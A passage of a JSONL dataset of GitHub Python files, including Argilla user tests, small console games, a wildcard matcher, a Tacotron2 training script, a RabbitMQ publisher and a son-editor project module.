'created_time': '2018-08-10T21:01:30+0300',\n 'choices': [{'type': 'low_rating_reason', 'value': 'rudedriver'}],\n 'badges': [],\n 'allow_overwrite': True,\n 'order_city': 'Москва',\n 'order_created_time': '2018-08-10T21:01:30+0300',\n 'order_cancelled': False,\n 'order_completed': False,\n 'order_finished_for_client': True,\n 'driver_license': 'AB0254',\n }\n response = call(taxi_feedback, 'save', save_request)\n assert response.status_code == 200\n assert response.json() == {}\n\n response = call(taxi_feedback, 'retrieve', retrieve_request)\n assert response.status_code == 200\n data = response.json()\n assert data == {\n 'rating': 3,\n 'msg': 'message',\n 'call_me': True,\n 'choices': [{'type': 'low_rating_reason', 'value': 'rudedriver'}],\n 'is_after_complete': False,\n 'app_comment': False,\n }\n\n wanted_push_request = {\n 'id': 'user_id',\n 'phone_id': '123456789012345678901234',\n 'order_id': 'order_id',\n 'order_created': '2018-08-09T16:31:13+0000',\n 'order_due': '2018-08-09T16:31:14+0000',\n 'order_completed': '2018-08-10T16:31:15+0000',\n 'park_id': 'park_id',\n }\n response = call(taxi_feedback, 'wanted/push', wanted_push_request)\n assert response.status_code == 
409\n\n wanted_push_request['switched_to_card'] = True\n response = call(taxi_feedback, 'wanted/push', wanted_push_request)\n assert response.status_code == 200\n assert response.json() == {}\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/testsuite/feedback/test_complex.py","file_name":"test_complex.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17383389693","text":"class Player:\n name = None\n points = 10\n m_games_won = 0\n m_games_lose = 0\n record_counter = 999\n b_games_won = 0\n b_games_lose = 0\n b_games_return = 0\n\n def __init__(self, name, points=10, m_games_won=0, m_games_lose=0,\n record_counter=999, b_games_won=0, b_games_lose=0, b_games_return=0):\n self.name = name\n self.points = points\n self.m_games_won = m_games_won\n self.m_games_lose = m_games_lose\n self.record_counter = record_counter\n self.b_games_won = b_games_won\n self.b_games_lose = b_games_lose\n self.b_games_return = b_games_return\n\n @property\n def m_games_played(self):\n return self.m_games_won + self.m_games_lose\n\n @property\n def m_win_rate(self):\n if self.m_games_played:\n return round(self.m_games_won / self.m_games_played, 2)\n else:\n return '-'\n\n @property\n def b_games_played(self):\n return self.b_games_won + self.b_games_lose + self.b_games_return\n\n @property\n def b_win_rate(self):\n if self.b_games_played:\n return round(self.b_games_won / self.b_games_played, 2)\n else:\n return '-'\n\n def print_stat(self):\n print(\n f'\\nPlayer name: {self.name}'\n f'\\nPlayer points: {self.points}'\n '\\n\\nMagic'\n f'\\nTotal games played: {self.m_games_played}'\n f'\\nGames won: {self.m_games_won}'\n f'\\nWin rate: {self.m_win_rate}'\n f'\\nRecord number of attempts: {self.record_counter}'\n '\\n\\nBlackjack'\n f'\\nTotal games played: {self.b_games_played}'\n f'\\nGames won: {self.b_games_won}'\n f'\\nWin rate: {self.b_win_rate}'\n )\n","repo_name":"annetDe/studying_python_basic","sub_path":"coursework/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9653583231","text":"from typing import TYPE_CHECKING\nfrom uuid import UUID\n\nimport pytest\nfrom argilla.client.api import ArgillaSingleton\nfrom argilla.client.sdk.users.models import UserRole\nfrom argilla.client.sdk.v1.workspaces.models import WorkspaceModel as WorkspaceModelV1\nfrom argilla.client.sdk.workspaces.models import WorkspaceModel as WorkspaceModelV0\nfrom argilla.client.users import User\n\nif TYPE_CHECKING:\n from argilla.server.models import User as ServerUser\n\nfrom tests.factories import UserFactory, WorkspaceFactory\n\n\ndef test_user_cls_init() -> None:\n with pytest.raises(\n Exception,\n match=r\"`User` cannot be initialized via the `__init__` method | you should use `User.from_name\\('test_user'\\)`\",\n ):\n User(name=\"test_user\")\n\n with pytest.raises(\n Exception,\n match=r\"`User` cannot be initialized via the `__init__` method | you should use `User.from_id\\('00000000-0000-0000-0000-000000000000'\\)`\",\n ):\n User(id=\"00000000-0000-0000-0000-000000000000\")\n\n\n@pytest.mark.asyncio\nasync def test_user_from_name(owner: \"ServerUser\") -> None:\n new_user = await UserFactory.create(username=\"test_user\")\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_name(new_user.username)\n assert user.username == new_user.username\n 
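# The Player win-rate properties in the record above guard their divisions so
# a player with no games returns '-' instead of raising ZeroDivisionError.
# The same guard as a small free function (illustrative only):
def win_rate(won, played):
    # mirror the class behaviour: a placeholder when no games were played
    return round(won / played, 2) if played else '-'

assert win_rate(3, 4) == 0.75
assert win_rate(0, 0) == '-'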
assert isinstance(user.id, UUID)\n\n with pytest.raises(ValueError, match=\"User with username=\"):\n User.from_name(\"non-existing-user\")\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_from_name_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `from_name`\"):\n User.from_name(name=user.username)\n\n\n@pytest.mark.asyncio\nasync def test_user_from_id(owner: \"ServerUser\") -> None:\n new_user = await UserFactory.create(username=\"test_user\")\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_id(id=new_user.id)\n assert user.username == \"test_user\"\n assert isinstance(user.id, UUID)\n\n with pytest.raises(ValueError, match=\"User with id=\"):\n User.from_id(id=\"00000000-0000-0000-0000-000000000000\")\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_from_id_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `from_id`\"):\n User.from_id(id=user.id)\n\n\ndef test_user_me(owner: \"ServerUser\") -> None:\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.me()\n assert user.id == owner.id\n assert user.username == owner.username\n\n\n@pytest.mark.asyncio\nasync def test_user_create(owner: \"ServerUser\") -> None:\n workspace = await WorkspaceFactory.create(name=\"test_workspace\")\n\n ArgillaSingleton.init(api_key=owner.api_key)\n\n with pytest.warns(UserWarning):\n new_user = User.create(\"test_user\", password=\"test_password\", workspaces=[\"test_workspace\"])\n assert new_user.first_name == \"test_user\"\n assert new_user.last_name is None\n assert new_user.full_name == \"test_user\"\n assert new_user.username == \"test_user\"\n assert new_user.workspaces == [\n WorkspaceModelV1(\n id=workspace.id,\n name=workspace.name,\n inserted_at=workspace.inserted_at,\n updated_at=workspace.updated_at,\n )\n ]\n\n with pytest.raises(KeyError, match=\"already exists in Argilla\"):\n User.create(\"test_user\", password=\"test_password\")\n\n\ndef test_user_create_with_non_existent_workspace(owner: \"ServerUser\") -> None:\n ArgillaSingleton.init(api_key=owner.api_key)\n\n with pytest.raises(ValueError, match=\"^(.*)Workspace 'non_existent_workspace' does not exist$\"):\n User.create(\"test_user\", password=\"test_password\", workspaces=[\"non_existent_workspace\"])\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_create_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `create`\"):\n User.create(\"test_user\", password=\"test_password\", role=role)\n\n\n@pytest.mark.asyncio\nasync def test_user_list(owner: \"ServerUser\") -> None:\n await UserFactory.create(username=\"user_1\")\n await UserFactory.create(username=\"user_2\")\n ArgillaSingleton.init(api_key=owner.api_key)\n\n users = User.list()\n assert all(user.username in [\"user_1\", \"user_2\", owner.username] for user in users)\n\n\n@pytest.mark.parametrize(\"role\", 
[UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_list_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `list`\"):\n User.list()\n\n\n@pytest.mark.asyncio\nasync def test_user_delete_user(owner: \"ServerUser\") -> None:\n new_user = await UserFactory.create(username=\"test_user\")\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_name(\"test_user\")\n assert user.username == new_user.username\n\n user.delete()\n with pytest.raises(ValueError, match=\"doesn't exist in Argilla\"):\n user.delete()\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_delete_not_allowed_role(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n user = User.me()\n with pytest.raises(PermissionError, match=f\"User with role={role} is not allowed to call `delete`\"):\n user.delete()\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.owner, UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_repr(role: UserRole) -> None:\n user = await UserFactory.create(role=role)\n ArgillaSingleton.init(api_key=user.api_key)\n\n assert str(User.me()) == (\n f\"User(id={user.id}, username={user.username}, role={user.role},\"\n f\" api_key={user.api_key}, first_name={user.first_name},\"\n f\" last_name={user.last_name}, inserted_at={user.inserted_at},\"\n f\" updated_at={user.updated_at})\"\n )\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.owner, UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_workspaces(role: UserRole) -> None:\n workspaces = await WorkspaceFactory.create_batch(3)\n user = await UserFactory.create(role=role, workspaces=workspaces)\n ArgillaSingleton.init(api_key=user.api_key)\n\n user = User.me()\n assert isinstance(user.workspaces, list)\n assert len(user.workspaces) == len(workspaces)\n assert all(isinstance(workspace, (WorkspaceModelV0, WorkspaceModelV1)) for workspace in user.workspaces)\n assert [workspace.name for workspace in workspaces] == [workspace.name for workspace in user.workspaces]\n\n\n@pytest.mark.parametrize(\"role\", [UserRole.admin, UserRole.annotator])\n@pytest.mark.asyncio\nasync def test_user_workspaces_from_owner_to_any(owner: \"ServerUser\", role: UserRole) -> None:\n workspaces = await WorkspaceFactory.create_batch(3)\n user = await UserFactory.create(role=role, workspaces=workspaces)\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_name(user.username)\n assert isinstance(user.workspaces, list)\n assert len(user.workspaces) == len(workspaces)\n assert all(isinstance(workspace, (WorkspaceModelV0, WorkspaceModelV1)) for workspace in user.workspaces)\n assert [workspace.name for workspace in workspaces] == [workspace.name for workspace in user.workspaces]\n\n\n@pytest.mark.parametrize(\n \"role, is_owner, is_admin, is_annotator\",\n [\n (UserRole.owner, True, False, False),\n (UserRole.admin, False, True, False),\n (UserRole.annotator, False, False, True),\n ],\n)\n@pytest.mark.asyncio\nasync def test_user_role_property(\n role: UserRole, owner: \"ServerUser\", is_owner: bool, is_admin: bool, is_annotator: bool\n) -> None:\n user = await UserFactory.create(role=role)\n\n ArgillaSingleton.init(api_key=owner.api_key)\n\n user = User.from_name(user.username)\n 
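# The tests in this record drive one test body per user role through
# @pytest.mark.parametrize. A minimal self-contained illustration of that
# pattern (hypothetical values, unrelated to the argilla API):
import pytest

@pytest.mark.parametrize("role, expected", [("owner", True), ("annotator", False)])
def test_is_owner_flag(role: str, expected: bool) -> None:
    assert (role == "owner") is expected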
assert user.is_owner == is_owner\n assert user.is_admin == is_admin\n assert user.is_annotator == is_annotator\n","repo_name":"argilla-io/argilla","sub_path":"tests/integration/client/test_users.py","file_name":"test_users.py","file_ext":"py","file_size_in_byte":8671,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"66"} +{"seq_id":"17680790638","text":"import re\r\nclass Solution:\r\n def isMatch(self, s, p):\r\n \"\"\"\r\n :type s: str\r\n :type p: str\r\n :rtype: bool\r\n \"\"\"\r\n # collapse runs of consecutive '*' in p into one, and convert p into the form re expects\r\n temp = []\r\n for i in range(len(p)):\r\n if p[i] == '*' and p[i-1] == '*' and i > 0:\r\n continue\r\n elif p[i] == '*':\r\n temp.append('[a-z]*')\r\n elif p[i] == '?':\r\n temp.append('.')\r\n else:\r\n temp.append(p[i])\r\n p_trans = ''\r\n for e in temp:\r\n p_trans += e\r\n print('p:', p_trans)\r\n\r\n # # convert p into the form re expects\r\n # p1 = []\r\n # for i in range(len(p)):\r\n # if p[i] == '*':\r\n # p1.append('[a-z]*')\r\n # elif p[i] == '?':\r\n # p1.append('.')\r\n # else:\r\n # p1.append(p[i])\r\n # p_trans = ''\r\n # for e in p1:\r\n # p_trans += e\r\n # print('p_trans:', p_trans)\r\n try:\r\n span = re.search(p_trans, s).span()\r\n if span[0] == 0 and span[1] == len(s):\r\n return True\r\n except:\r\n return False\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n sol = Solution()\r\n # s = \"aa\"\r\n # p = \"*\"\r\n\r\n # s = \"adceb\"\r\n # p = \"*a*b\"\r\n\r\n # s = \"acdcb\"\r\n # p = \"a*c?b\"\r\n\r\n # s = \"aaaabaaaabbbbaabbbaabbaababbabbaaaababaaabbbbbbaabbbabababbaaabaabaaaaaabbaabbbbaababbababaabbbaababbbba\"\r\n # p = \"*****b*aba***babaa*bbaba***a*aaba*b*aa**a*b**ba***a*a*\"\r\n #\r\n s = \"aabbbaaaabbbabbabaaabaaabababbbbbaaababbbababaaaaaabbabaaaababbbababababbbbabaaaaabbabbabbbbbabbabaaaa\"\r\n p = \"b***bbb*b*bb***a*ba*b**aab*abb**aabb**a**baba*b*abbba\"\r\n print(sol.isMatch(s, p))","repo_name":"huangjianyu111/leetcode-python","sub_path":"wildcard_matching_2.py","file_name":"wildcard_matching_2.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"276052174","text":"import random\r\n\r\n# Rock Paper Scissors\r\nR = \"rock\"\r\nP = \"paper\"\r\nS = \"scissors\"\r\n\r\nuser_win = 0\r\ncomp_win = 0\r\n\r\n
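# The wildcard matcher above converts '*' and '?' into a regex by hand; the
# standard library ships that translation as fnmatch.translate, which also
# anchors the pattern so partial matches cannot slip through. A sketch using
# two of the record's own commented test cases:
import fnmatch
import re

assert re.match(fnmatch.translate("*a*b"), "adceb") is not None   # matches
assert re.match(fnmatch.translate("a*c?b"), "acdcb") is None      # does not match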
while True: # Start an outer loop for the entire game\r\n \r\n x = input(\"rock, paper, scissors? (Type 'quit' to exit): \").lower()\r\n if x == 'quit':\r\n break # Exit the game loop if the user wants to quit\r\n \r\n choice = random.choice([R, P, S])\r\n print(f\"Computer chose: {choice}\")\r\n \r\n if choice == x:\r\n print(\"It was a draw\")\r\n elif x == R:\r\n if choice == S:\r\n print(\"You win\")\r\n user_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n else:\r\n print(\"You lose\")\r\n comp_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n elif x == P:\r\n if choice == R:\r\n print(\"You win\")\r\n user_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n else:\r\n print(\"You lose\")\r\n comp_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n elif x == S:\r\n if choice == P:\r\n print(\"You win\")\r\n user_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n else:\r\n print(\"You lose\")\r\n comp_win += 1\r\n print(\"Your score is: \", str(user_win))\r\n print(\"Computer score is: \", str(comp_win))\r\n else:\r\n print(\"Invalid input. Please choose rock, paper, or scissors.\")\r\n \r\n play_again = input(\"Do you want to play again? (yes/no): \").lower()\r\n if play_again != 'yes':\r\n break # Exit the game loop if the user doesn't want to play again\r\n\r\n\r\n# TIC TAC TOE GAME\r\ndef print_board(board):\r\n for row in board:\r\n print(\"|\".join(row))\r\n print(\"-\" * 5)\r\n\r\ndef check_winner(board, player):\r\n for i in range(3):\r\n if all(board[i][j] == player for j in range(3)):\r\n return True\r\n if all(board[j][i] == player for j in range(3)):\r\n return True\r\n\r\n if all(board[i][i] == player for i in range(3)):\r\n return True\r\n\r\n if all(board[i][2-i] == player for i in range(3)):\r\n return True\r\n\r\n return False\r\n\r\ndef is_board_full(board):\r\n for row in board:\r\n for cell in row:\r\n if cell == \" \":\r\n return False\r\n return True\r\n\r\ndef get_move():\r\n while True:\r\n try:\r\n row = int(input(\"Enter the row (0-2): \"))\r\n col = int(input(\"Enter the column (0-2): \"))\r\n if 0 <= row < 3 and 0 <= col < 3:\r\n return row, col\r\n print(\"Invalid input. Row and column must be between 0 and 2.\")\r\n except ValueError:\r\n print(\"Invalid input. Please enter a number.\")\r\n\r\ndef play_tic_tac_toe():\r\n board = [[\" \" for _ in range(3)] for _ in range(3)]\r\n players = [\"X\", \"O\"]\r\n current_player = 0\r\n\r\n print(\"Welcome to Tic Tac Toe!\")\r\n print_board(board)\r\n\r\n for _ in range(9):\r\n player = players[current_player]\r\n print(f\"Player {player}'s turn.\")\r\n row, col = get_move()\r\n\r\n while board[row][col] != \" \":\r\n print(\"Cell already taken. Try again.\")\r\n row, col = get_move()\r\n\r\n board[row][col] = player\r\n print_board(board)\r\n\r\n if check_winner(board, player):\r\n print(f\"Player {player} wins!\")\r\n return\r\n\r\n if is_board_full(board):\r\n print(\"It's a tie!\")\r\n return\r\n\r\n current_player = 1 - current_player\r\n\r\nif __name__ == \"__main__\":\r\n play_tic_tac_toe()\r\n\r\n#calculator\r\n\r\ndef add(a, b):\r\n answer = a + b\r\n print(answer)\r\n\r\ndef sub(a, b):\r\n answer = a - b\r\n print(answer)\r\n\r\ndef mul(a, b):\r\n answer = a * b\r\n print(answer)\r\n\r\ndef div(a, b):\r\n answer = a / b\r\n print(answer)\r\n\r\nwhile True:\r\n print(\"A. Addition\")\r\n print(\"B. 
Subtraction\")\r\n print(\"C. Multiplication\")\r\n print(\"D. Division\")\r\n print(\"E. Exit\")\r\n\r\n choice = input(\"Input your operation: \")\r\n \r\n if choice == \"a\" or choice == \"A\":\r\n print(\"Addition\")\r\n a = int(input(\"Input first number: \"))\r\n b = int(input(\"Input second number\"))\r\n add(a, b)\r\n\r\n elif choice == \"b\" or choice == \"B\":\r\n print(\"Subtraction\")\r\n a = int(input(\"Input first number: \"))\r\n b = int(input(\"Input second number\"))\r\n sub(a, b)\r\n \r\n elif choice == \"c\" or choice == \"C\":\r\n print(\"Multiplication\")\r\n a = int(input(\"Input first number: \"))\r\n b = int(input(\"Input second number\"))\r\n mul(a, b)\r\n\r\n elif choice == \"d\" or choice == \"D\":\r\n print(\"Division\")\r\n a = int(input(\"Input first number: \"))\r\n b = int(input(\"Input second number\"))\r\n div(a, b)\r\n\r\n elif choice == \"e\" or choice == \"E\":\r\n print(\"program ended\")\r\n quit()\r\n\r\nimport random\r\n\r\ndef watch():\r\n x = input(\"Do you want to play again (yes/no): \")\r\n if x.lower() != \"yes\":\r\n quit()\r\n\r\nwhile True:\r\n user_guess = input(\"Guess the number between 1 to 20: \")\r\n\r\n if user_guess.isdigit():\r\n user_guess = int(user_guess)\r\n if user_guess < 1 or user_guess > 20:\r\n print(\"Guess a number between 1 and 20\")\r\n else:\r\n computer_guess = random.randint(1, 20)\r\n print(\"The computer guessed:\", computer_guess)\r\n\r\n if user_guess != computer_guess:\r\n print(\"You lost\")\r\n else:\r\n print(\"You won\")\r\n\r\n watch()\r\n else:\r\n print(\"Please type a number next time\")","repo_name":"Noble16-code/webpro","sub_path":"Back end dev.py","file_name":"Back end dev.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19591661799","text":"import bukkitadmin\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n\npackages = [\n 'bukkitadmin',\n]\n\nrequires = [\n 'requests_cache>=0.4.4',\n 'pager>=3.3',\n 'argcomplete>=0.8.0',\n 'progressbar>=2.3',\n 'beautifulsoup4>=4.3.2',\n 'feedparser>=5.1.3',\n 'requests>=1.2.3',\n 'pyyaml>=3.10',\n 'pexpect>=2.4',\n]\n\nsetup(\n name = \"bukkitadmin\",\n version = bukkitadmin.__version__,\n packages = packages,\n install_requires=requires,\n zip_safe=False,\n package_dir={'bukkitadmin': 'bukkitadmin'},\n entry_points = {\n 'console_scripts': [\n 'bukkit = bukkitadmin.commands:main'\n ]\n }\n)\n","repo_name":"andrepl/bukkitadmin","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6446963208","text":"import random\n\nimport torch\n\nfrom TrainingInterfaces.Text_to_Spectrogram.Tacotron2.Tacotron2 import Tacotron2\nfrom TrainingInterfaces.Text_to_Spectrogram.Tacotron2.TacotronDataset import TacotronDataset\nfrom TrainingInterfaces.Text_to_Spectrogram.Tacotron2.tacotron2_train_loop import train_loop\nfrom Utility.path_to_transcript_dicts import *\n\n\ndef run(gpu_id, resume_checkpoint, finetune, model_dir, resume):\n if gpu_id == \"cpu\":\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"\"\n device = torch.device(\"cpu\")\n\n else:\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n device = torch.device(\"cuda\")\n\n torch.manual_seed(131714)\n random.seed(131714)\n torch.random.manual_seed(131714)\n\n 
print(\"Preparing\")\n cache_dir_hifitts = os.path.join(\"Corpora\", \"multispeaker_nvidia_hifitts\")\n os.makedirs(cache_dir_hifitts, exist_ok=True)\n\n if model_dir is not None:\n save_dir = model_dir\n else:\n save_dir = os.path.join(\"Models\", \"Tacotron2_MultispeakerEnglish\")\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n train_set = TacotronDataset(build_path_to_transcript_dict_nvidia_hifitts(),\n cache_dir=cache_dir_hifitts,\n lang=\"en\",\n speaker_embedding=True,\n cut_silences=True,\n min_len_in_seconds=3,\n max_len_in_seconds=12,\n device=device)\n\n model = Tacotron2(idim=166, odim=80, spk_embed_dim=960)\n\n print(\"Training model\")\n train_loop(net=model,\n train_dataset=train_set,\n device=device,\n save_directory=save_dir,\n steps=100000,\n batch_size=64,\n epochs_per_save=1,\n use_speaker_embedding=True,\n lang=\"en\",\n lr=0.001,\n path_to_checkpoint=resume_checkpoint,\n fine_tune=finetune,\n resume=resume)\n","repo_name":"leo1129/IMS-Toucan","sub_path":"TrainingInterfaces/TrainingPipelines/Tacotron2_MultiEnglish.py","file_name":"Tacotron2_MultiEnglish.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"6107278157","text":"import rabbitpy\nimport time\nimport random\nimport json\nfrom constants import *\n\ndef publisher():\n connection = rabbitpy.Connection(BROKER_URL) # Connect to RabbitMQ server\n channel = connection.channel() # Create new channel on the connection\n\n # Create a \"topic\" exchange to post sensor data\n exchange = rabbitpy.Exchange(channel, EXCHANGE_ID, exchange_type='topic')\n exchange.declare() # ensure exchange exists on the server\n # can remove using exchange.delete()\n\n time.sleep(5)\n for i in range(100):\n data = {'seq': i, 'id': 'sensor123', 'temp': random.randint(0,50)}\n message = rabbitpy.Message(channel, json.dumps(data)) # serialize data to string\n # Publish the message using a \"routing key\"\n print(f\"publisher: emitting event '{data}'\")\n message.publish(exchange, 'temp.sensor123')\n time.sleep(5)\n\nif __name__ == \"__main__\":\n\tpublisher()","repo_name":"tvcutsem/distributed-systems","sub_path":"indirect_communication/publish_subscribe/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"28406923539","text":"'''\nCreated on 05.08.2016\n\n@author: Jonas\n'''\nimport os, stat\nimport shlex\nimport shutil\nfrom subprocess import Popen, PIPE\n\nfrom son_editor.app.database import db_session, scan_project_dir\nfrom son_editor.app.exceptions import NotFound, NameConflict\nfrom son_editor.impl import gitimpl\nfrom son_editor.models.project import Project\nfrom son_editor.models.workspace import Workspace\nfrom son_editor.util.descriptorutil import sync_project_descriptor\nfrom son_editor.util.requestutil import get_config, rreplace\n\nWORKSPACES_DIR = os.path.expanduser(get_config()[\"workspaces-location\"])\n# make ws paths prettier\nWORKSPACES_DIR = os.path.normpath(WORKSPACES_DIR)\n\n\ndef get_projects(ws_id: int) -> list:\n \"\"\"\n Get a list of projects in this workspace\n\n :param ws_id: The workspace ID\n :return: List of all projects\n \"\"\"\n session = db_session()\n projects = session.query(Project). \\\n join(Workspace). 
\\\n filter(Workspace.id == ws_id).all()\n session.commit()\n return list(map(lambda x: x.as_dict(), projects))\n\n\ndef get_project(ws_id, pj_id):\n \"\"\"\n Get a specific project \n :param ws_id: The workspace ID\n :param pj_id: The project ID\n :return: The project descriptor\n \"\"\"\n session = db_session()\n project = session.query(Project). \\\n join(Workspace). \\\n filter(Workspace.id == ws_id). \\\n filter(Project.id == pj_id). \\\n first()\n session.commit()\n if project:\n return project.as_dict()\n else:\n raise NotFound(\"No project with id {} could be found\".format(pj_id))\n\n\ndef create_project(ws_id: int, project_data: dict) -> dict:\n \"\"\"\n Create a new Project in this workspace\n\n :param ws_id: The workpace ID\n :param project_data: The project data to create\n :return: The new project descriptor as a dict\n \"\"\"\n project_name = shlex.quote(project_data[\"name\"])\n repo = None\n if \"repo\" in project_data:\n repo = project_data[\"repo\"]\n\n if repo:\n return gitimpl.clone(ws_id, repo, project_name)\n\n session = db_session()\n\n # test if ws Name exists in database\n\n workspace = session.query(Workspace). \\\n filter(Workspace.id == ws_id).first()\n if workspace is None:\n raise NotFound(\"No workspace with id {} was found\".format(ws_id))\n\n existing_projects = list(session.query(Project)\n .filter(Project.workspace == workspace)\n .filter(Project.name == project_name))\n if len(existing_projects) > 0:\n raise NameConflict(\"Project with name '{}' already exists in this workspace\".format(project_name))\n\n # prepare db insert\n try:\n project = Project(name=project_name, rel_path=project_name, workspace=workspace)\n set_data(project, project_data)\n\n session.add(project)\n except:\n session.rollback()\n raise\n # create workspace on disk\n proc = Popen(['son-workspace',\n '--workspace', workspace.path,\n '--project', get_project_path(workspace.path, project_name)],\n stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n exitcode = proc.returncode\n\n if err.decode().find('exists') >= 0:\n project_exists = True\n else:\n project_exists = False\n\n if exitcode == 0 and not project_exists:\n sync_project_descriptor(project)\n session.commit()\n scan_project_dir(get_project_path(workspace.path, project_name), project)\n return project.as_dict()\n else:\n session.rollback()\n if project_exists:\n raise NameConflict(\"Project with name '{}' already exists in this workspace\".format(project_name))\n raise Exception(err.decode(), out.decode())\n\n\ndef update_project(project_data, project_id):\n \"\"\"\n Update the Project\n\n :param project_data: The project Data\n :param project_id: The project ID to update\n :return: The updated project descriptor\n \"\"\"\n session = db_session()\n project = session.query(Project).filter(Project.id == project_id).first()\n if project is None:\n raise NotFound(\"Project with id {} could not be found\".format(project_id))\n\n # Update name\n if 'name' in project_data and project_data['name'] != project.name:\n if os.path.exists(get_project_path(project.workspace.path, project.rel_path)):\n new_name = shlex.quote(project_data['name'])\n old_path = get_project_path(project.workspace.path, project.rel_path)\n new_path = rreplace(old_path, project.name, new_name, 1)\n\n if os.path.exists(new_path):\n raise NameConflict(\"Invalid name parameter, workspace '{}' already exists\".format(new_name))\n\n # Do not allow move directories outside of the workspaces_dir\n if not new_path.startswith(WORKSPACES_DIR):\n raise 
Exception(\"Invalid path parameter, you are not allowed to break out of {}\".format(WORKSPACES_DIR))\n else:\n # Move the directory\n shutil.move(old_path, new_path)\n project.name = new_name\n project.rel_path = new_name\n set_data(project, project_data)\n sync_project_descriptor(project)\n db_session.commit()\n return project.as_dict()\n\n\ndef set_data(project: Project, project_data: dict) -> None:\n \"\"\"\n Extracts the data from the dictionary and sets it on the database model\n\n :param project: The project database model\n :param project_data: The project data dictionary from the frontend\n \"\"\"\n if \"description\" in project_data:\n project.description = project_data['description']\n if \"maintainer\" in project_data:\n project.maintainer = project_data['maintainer']\n if \"publish_to\" in project_data:\n project.publish_to = \",\".join(project_data['publish_to'])\n if \"vendor\" in project_data:\n project.vendor = project_data['vendor']\n if \"version\" in project_data:\n project.version = project_data['version']\n\n\ndef on_rm_error(func, path, exc_info):\n \"\"\"Gets called if rm_tree gets an error, happens\n especially if trying to remove .git files on windows\"\"\"\n # path contains the path of the file that couldn't be removed\n # let's just assume that it's read-only and unlink it.\n os.chmod(path, stat.S_IWRITE)\n os.unlink(path)\n\n\ndef delete_project(project_id: int) -> dict:\n \"\"\"\n Deletes the project from the database and from the Disk\n\n :param project_id: The id of the project to be deleted\n :return: The deleted project descriptor\n \"\"\"\n session = db_session()\n project = session.query(Project).filter(Project.id == int(project_id)).first()\n if project:\n path = get_project_path(project.workspace.path, project.rel_path)\n\n shutil.rmtree(path, onerror=on_rm_error)\n session.delete(project)\n db_session.commit()\n if project:\n return project.as_dict()\n else:\n raise NotFound(\"Project with id {} was not found\".format(project_id))\n\n\ndef get_project_path(workspace_path: str, rel_path: str) -> str:\n \"\"\"\n Helper method to resolve the project path on disk for the given project\n\n :param workspace_path: the path to the workspace\n :param rel_path: the relative path of the project\n :return: The absolute project path\n \"\"\"\n return os.path.join(workspace_path, \"projects\", 